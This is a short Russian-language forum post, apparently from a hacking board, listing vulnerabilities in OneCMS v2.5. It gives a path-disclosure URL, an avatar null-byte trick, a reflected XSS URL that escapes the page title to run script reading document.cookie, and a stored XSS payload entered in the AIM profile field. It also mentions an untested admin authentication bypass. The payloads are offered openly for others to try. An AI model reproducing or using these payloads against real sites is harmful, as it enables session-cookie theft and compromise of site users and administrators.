28.02.2010, 18:23
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Иньекций много, но уже фильтруються
OneCMS v2.5.
Пути:
/index.php?load=elite&view=friends&user[]=
/index.php?load=elite
Аву на %00 меняем.
Пассивная XSS:
/index.php?load=elite&view=collectio1n'</title><script>alert(document.cookie);</script><title>123&user=
Активная XSS:
index.php?load=elite
в AIM: <script>alert(document.cookie);</script>
Там ещё в админке auth By pass, но чо то редирект глючный, проверьте у себя |
|
|